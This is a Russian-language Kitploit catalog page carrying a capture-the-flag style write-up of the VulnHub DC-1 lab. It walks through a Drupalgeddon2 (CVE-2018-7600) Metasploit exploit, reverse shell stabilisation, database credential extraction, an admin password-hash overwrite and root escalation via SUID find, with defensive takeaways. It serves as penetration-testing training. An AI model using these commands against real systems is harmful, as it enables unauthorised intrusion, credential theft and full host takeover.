Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
VulnHub-DC1-Writeup — VulnHub DC-1 boot-to-root — эксплуатация CVE-2018-7600 (Drupalgeddon2) для RCE, извлечение учётных данных БД из settings.php, подделка хэша пароля администратора и повышение привилегий до root через SUID find. | Kitploit
Инструменты/GitHubGitHub/prapul1/vulnhub-dc1-writeup
Повышение привилегийРазведкаФреймворки для эксплойтовСканирование портовАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияCTF

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Тестирование на Проникновение
Неправильная Конфигурация
Обучение и Образование
GitHubprapul1/vulnhub-dc1-writeup

VulnHub-DC1-Writeup

VulnHub DC-1 boot-to-root — эксплуатация CVE-2018-7600 (Drupalgeddon2) для RCE, извлечение учётных данных БД из settings.php, подделка хэша пароля администратора и повышение привилегий до root через SUID find.

Репозиторий
162 месяцев назадЕщё не проверено

VulnHub-DC1-Writeup

"Заметки по лабораторным работам по пентесту, документирующие полные цепочки атак — от разведки до root."

🔓 VulnHub — DC-1 Boot-to-Root Writeup

Сложность: Начальный–Средний
Платформа: VulnHub
Цель: Получить все 4 флага и добиться полной компрометации с правами root
ОС атакующего: Kali Linux (VirtualBox — NAT Network)
ОС цели: Debian Linux (CMS Drupal 7)


📌 Содержание

  1. Настройка лаборатории
  2. Разведка и сбор информации
  3. Эксплуатация — удалённое выполнение кода
  4. Пост-эксплуатация — стабилизация шелла
  5. Флаг 1 — перечисление веб-сервера
  6. Флаг 2 — извлечение учётных данных БД
  7. Флаг 3 — доступ к панели администратора через манипуляцию хэшем
  8. Флаг 4 и Root — повышение привилегий через SUID
  9. Сводка по навыкам и инструментам
  10. Ключевые выводы

🛠 Настройка лаборатории

КомпонентДетали
ГипервизорVirtualBox

Обе виртуальные машины были настроены в одной NAT Network в VirtualBox, чтобы обеспечить взаимодействие между ВМ, сохраняя при этом изолированную лабораторную среду.


🔍 Разведка и сбор информации

Обнаружение хостов

Использовал arp-scan для определения всех активных хостов в локальной подсети:

root@kitploit:~
sudo arp-scan -l

Результат: Цель обнаружена по адресу 10.0.2.3

Сканирование служб и портов

Запустил полное сканирование Nmap с определением версий и стандартными скриптами:

root@kitploit:~
sudo nmap -sV -sC 10.0.2.3

Ключевые находки:

ПортСлужбаВерсия
22/tcpSSHOpenSSH 6.0p1
80/tcpHTTPApache 2.2.22
111/tcprpcbind—

🔑 Критично: Nmap явно идентифицировал веб-приложение как Drupal 7 через HTTP-заголовки генератора — что подтверждает известную уязвимую версию CMS.


💥 Эксплуатация — удалённое выполнение кода

Уязвимость: Drupalgeddon2 (CVE-2018-7600)

Drupal 7 подвержен критической уязвимости удалённого выполнения кода (RCE) в своём Form API. Неаутентифицированный атакующий может отправить специально сформированный HTTP-запрос, который серверная часть выполнит как системную команду — без какой-либо аутентификации.

Запущен Metasploit Framework:

root@kitploit:~
msfconsole
search drupalgeddon
use exploit/multi/http/drupal_drupageddon2
set RHOSTS 10.0.2.3
exploit

Результат: Обратный шелл Meterpreter успешно открыт под пользователем www-data (процесс веб-сервера).


🐚 Пост-эксплуатация — стабилизация шелла

Переключился из Meterpreter в нативный шелл Linux и стабилизировал его с помощью Python PTY:

root@kitploit:~
shell
python -c 'import pty; pty.spawn("/bin/bash")'

Результат: Полноценный интерактивный bash-шелл под пользователем www-data@DC-1 в каталоге /var/www


🚩 Флаг 1 — перечисление веб-сервера

root@kitploit:~
ls -la /var/www
cat flag1.txt

Содержимое флага 1:

root@kitploit:~
Every good CMS needs a config file - and so do you.

💡 Подсказка: Указывает прямо на конфигурационный файл Drupal — settings.php


🚩 Флаг 2 — извлечение учётных данных БД

Перешёл в каталог конфигурации Drupal и изучил файл настроек:

root@kitploit:~
cd /var/www/sites/default
cat settings.php

Обнаружены учётные данные, встроенные в массив $databases:

ПолеЗначение
База данныхdrupaldb
Пользовательdbuser
ПарольR0ck3t

Содержимое флага 2 (из комментариев в файле):

root@kitploit:~
Brute force and dictionary attacks aren't the only ways to gain access
(and you WILL need access). What can you do with these credentials?

💡 Подсказка: Используйте учётные данные для доступа к серверу MySQL — без какого-либо брутфорса.


🚩 Флаг 3 — доступ к панели администратора через манипуляцию хэшем

Шаг 1: Перечисление базы данных

root@kitploit:~
mysql -u dbuser -pR0ck3t
use drupaldb;
select uid, name, pass from users;

Обнаружены хэшированные пароли для admin и fred — оба используют схему хэширования Drupal $S$ (на основе SHA-512).

Шаг 2: Формирование кастомного хэша пароля

Вместо взлома существующего хэша использовал встроенный PHP-скрипт Drupal для генерации нового:

root@kitploit:~
cd /var/www
php scripts/password-hash.sh password123

Вывод: Действительный хэш $S$D... для пароля password123

Шаг 3: Перезапись пароля администратора через SQL

root@kitploit:~
use drupaldb;
update users set pass='$S$DUxDdAfJe08Z9viU5Tly0uUZXFThRFMpeBwz4T07HB6Rj0Fm2JTp' where name='admin';

Выполнен вход на http://10.0.2.3 под admin / password123 успешно.

Содержимое флага 3 (найдено в панели контента администратора Drupal):

root@kitploit:~
Special PERMS will help FIND the passwd - but you'll need to -exec
that command to work out how to get what's in the shadow.

💡 Подсказка: Неправильная конфигурация SUID-бита у команды find — выявлен вектор повышения привилегий.


🚩 Флаг 4 и Root — повышение привилегий через SUID

Шаг 1: Перечисление пользователей системы

root@kitploit:~
cat /etc/passwd

Найден пользователь flag4 с домашним каталогом /home/flag4.

root@kitploit:~
cat /home/flag4/flag4.txt

Содержимое флага 4:

root@kitploit:~
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?

Шаг 2: Эксплуатация SUID через find

У бинарника find был установлен SUID-бит, то есть он выполняется с привилегиями владельца файла (root) независимо от того, кто его запускает.

root@kitploit:~
find . -exec /bin/sh \;
whoami
# root

Шаг 3: Флаг root

root@kitploit:~
cd /root
cat thefinalflag.txt
root@kitploit:~
Well done!!! Hope you enjoyed DC-1!

Достигнута полная компрометация с правами root. ✅


🛠 Сводка по навыкам и инструментам

Использованные инструменты

Продемонстрированные навыки

  • ✅ Сетевая разведка и обнаружение хостов
  • ✅ Определение служб и идентификация CMS
  • ✅ Исследование CVE и использование публичных эксплойтов
  • ✅ Metasploit Framework — развёртывание полезной нагрузки
  • ✅ Пост-эксплуатация и горизонтальное перемещение
  • ✅ Перечисление БД и извлечение учётных данных
  • ✅ Формирование хэшей паролей и SQL-инъекции через CLI
  • ✅ Аудит SUID-бинарников в Linux
  • ✅ Повышение привилегий до root

📚 Ключевые выводы

С точки зрения атакующего:

  • Не пропатченные CMS-платформы (даже отстающие на 1–2 мажорные версии) тривиально эксплуатируются через публичные CVE и модули Metasploit.
  • Конфигурационные файлы, такие как settings.php, часто содержат пароли в открытом виде, что переводит атакующего от веб-доступа к полному контролю над базой данных.
  • Неправильные настройки SUID на распространённых бинарниках, таких как find, vim или python, — один из самых надёжных векторов повышения привилегий в средах Linux.

С точки зрения защиты:

  • Всегда оперативно обновляйте CMS-платформы — для Drupalgeddon2 патчи были доступны; уязвимость заключалась в задержке их установки.
  • Секреты (учётные данные БД) никогда не должны храниться в доступных через веб конфигурационных файлах без шифрования или абстракции через переменные окружения.
  • Регулярно проверяйте SUID-бинарники: find / -perm -4000 -type f 2>/dev/null должна быть частью любого чек-листа по укреплению Linux.

⚠️ Отказ от ответственности

Этот writeup предназначен строго для образовательных целей и описывает действия, выполненные в изолированной, легальной лабораторной среде. Никогда не пытайтесь применять эти техники против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.


Выполнено Prapul | Профиль TryHackMe | GitHub

Скачать инструмент
Сетевой режимNAT Network (обе ВМ в одной подсети)
Машина атакующегоKali Linux
Целевая машинаDC-1 (VulnHub)
IP-адрес цели10.0.2.3 (обнаружен через arp-scan)
ИнструментНазначение
arp-scanОбнаружение хостов в локальной подсети
nmapСканирование портов и определение служб
Metasploit FrameworkДоставка эксплойта CVE-2018-7600 и обратный шелл
MySQL CLIПеречисление БД и манипуляция учётными данными
PHP (password-hash.sh)Нативная генерация хэшей Drupal
Python PTYСтабилизация шелла
VirtualBoxНастройка изолированной лабораторной среды